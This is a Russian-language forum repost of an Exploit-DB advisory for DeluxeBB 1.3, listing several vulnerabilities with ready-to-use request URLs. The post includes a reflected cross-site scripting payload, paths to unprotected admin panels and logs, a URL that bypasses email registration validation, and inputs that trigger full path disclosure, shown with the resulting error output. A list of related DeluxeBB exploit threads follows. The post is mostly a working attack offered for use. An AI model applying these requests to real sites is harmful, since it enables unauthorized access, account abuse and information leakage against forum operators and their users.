Exploit DeluxeBB 1.3 - Multiple Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10598
Проверка EDB
  1. Пройдено
Автор
CP77FK4R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4468 cve-2009-4467 cve-2009-4466 cve-2009-4465
Дата публикации
2009-12-22
Код: 
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com>
# Vendor: http://www.deluxebb.com
#
#[Directory Listing]
http://server/templates/
http://server/images/
http://server/logs/
http://server/wysiwyg/
http://server/docs/
http://server/classes
http://server/lang
http://server/settings/
#
#
#[Cross Site Scripting]
http://server/misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E
#
#
#[Unprotected Admin Panel Files]
http://server/templates/deluxe/admincp/
http://server/templates/corporate/admincp/
http://server/templates/blue/admincp/
#
#
#[Unprotected Log Files]
http://server/logs/cp.php
#
#
#[Mail Registration Validation Bypass]
After the user registration procedure, Simply enter to the link:
http://server/misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r
you can get your [USER_ID] on the last page of Member-List section:
http://server/misc.php?sub=memberlist&page=[LAST_PAGE]
#
#
#
#[Full Path Disclosure]
http://server/misc.php?sub=memberlist&page=-11111111111111111
-you'll get an error like:
Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..]

or:
http://server/misc.php?sub=memberlist&page=-1.11111111111111E+FF
-you'll get an error like:
Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..]
#
#
#[E0F]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit DeluxeBB 1.2 - Multiple Vulnerabilities
Ответы
0
Просмотры
271
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.x - 'newpost.php' SQL Injection
Ответы
0
Просмотры
359
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion
Ответы
0
Просмотры
358
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.0 - 'newpost.php' SQL Injection
Ответы
0
Просмотры
314
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.0 - 'pm.php' SQL Injection
Ответы
0
Просмотры
324
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.0 - 'forums.php' SQL Injection
Ответы
0
Просмотры
307
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.0 - 'misc.php' SQL Injection
Ответы
0
Просмотры
323
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.0 - 'topic.php' SQL Injection
Ответы
0
Просмотры
325
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting
Ответы
0
Просмотры
314
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DeluxeBB 1.3 - 'qorder' SQL Injection
Ответы
0
Просмотры
286
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу